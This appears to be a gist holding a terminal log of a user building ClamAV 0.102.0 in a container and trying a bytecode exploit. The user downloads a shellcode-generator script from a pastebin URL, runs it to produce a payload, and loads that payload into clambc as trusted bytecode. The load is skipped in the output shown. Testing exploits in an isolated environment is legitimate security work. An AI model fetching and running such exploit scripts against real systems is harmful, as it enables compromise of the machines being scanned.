Last active November 4, 2019 01:22
toolbox clamav exploit
[zv@sigstkflt] ~ >> toolbox enter -c clamav
toolbox: container clamav not found
Creating toolbox container clamav instead.
Use the 'create' command to create a different toolbox.
Try 'toolbox --help' for more information.
⬢[zv@toolbox ~]$ sudo dnf -qy builddep clamav
⬢[zv@toolbox ~]$ wget https://www.clamav.net/downloads/production/clamav-0.102.0.tar.gz && tar -xvf clam* && cd clam*;
⬢[zv@toolbox clamav-0.102.0]$ ( CFLAGS='-Og -g -march=native' CXXFLAGS="$CFLAGS" ./configure && make -j4 ) > /dev/null
⬢[zv@toolbox clamav-0.102.0]$ wget http://pastebin.com/raw/cfP7X89m -O clam_shellcode.py
⬢[zv@toolbox clamav-0.102.0]$ python3 clam_shellcode.py
File "/tmp/clam_shellcode.py", line 158
print 'Invalid string.'
^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print('Invalid string.')?
⬢[zv@toolbox clamav-0.102.0]$ python clam_shellcode.py
[+] Adding null-byte at the end of the string..
[+] Adding null-byte at the end of the string..
[+] Adding null-byte at the end of the string..
[+] Adding null-byte at the end of the string..
[+] Adding null-byte at the end of the string..
[+] Generated payload
⬢[zv@toolbox clamav-0.102.0]$ clambc --debug exploit
LibClamAV debug: searching for unrar, user-searchpath: /usr/local/lib64
LibClamAV debug: unrar support loaded from /usr/local/lib64/libclamunrar_iface.so.9.0.4 libclamunrar_iface_so_9_0
LibClamAV debug: Bytecode initialized in interpreter mode
LibClamAV debug: Loading trusted bytecode
LibClamAV debug: Skipping bytecode with (engine) functionality level 0-93 (current 111)
LibClamAV debug: line: 4096
LibClamAV debug: Parsed 0 functions
bytecode load skipped
⬢[zv@toolbox clamav-0.102.0]$ clambc --help
Clam AntiVirus: Bytecode Testing Tool 0.102.0
By The ClamAV Team: https://www.clamav.net/about.html#credits
(C) 2019 Cisco Systems, Inc.
clambc <file> [function] [param1 ...]
--help -h Show this help
--version -V Show version
--debug Show debug
--force-interpreter -f Force using the interpreter instead of the JIT
--trust-bytecode -t Trust loaded bytecode (default yes)
--info -i Print information about bytecode
--printsrc -p Print bytecode source
--printbcir -c Print IR of bytecode signature
--input -c Input file to run the bytecode on
--trace <level> -T Set bytecode trace level 0..7 (default 7)
--no-trace-showsource -s Don't show source line during tracing
--statistics=bytecode Collect and print bytecode execution statistics
file File to test
⬢[zv@toolbox clamav-0.102.0]$ clambc -f -t --debug -T 7 --statistics=bytecode -p -c exploit
LibClamAV debug: searching for unrar, user-searchpath: /usr/local/lib64
LibClamAV debug: unrar support loaded from /usr/local/lib64/libclamunrar_iface.so.9.0.4 libclamunrar_iface_so_9_0
LibClamAV debug: Loading trusted bytecode
LibClamAV debug: Skipping bytecode with (engine) functionality level 0-93 (current 111)
LibClamAV debug: line: 4096
LibClamAV debug: Parsed 0 functions
LibClamAV debug: cli_event_define error for time event id 0
bytecode load skipped
⬢[zv@toolbox clamav-0.102.0]$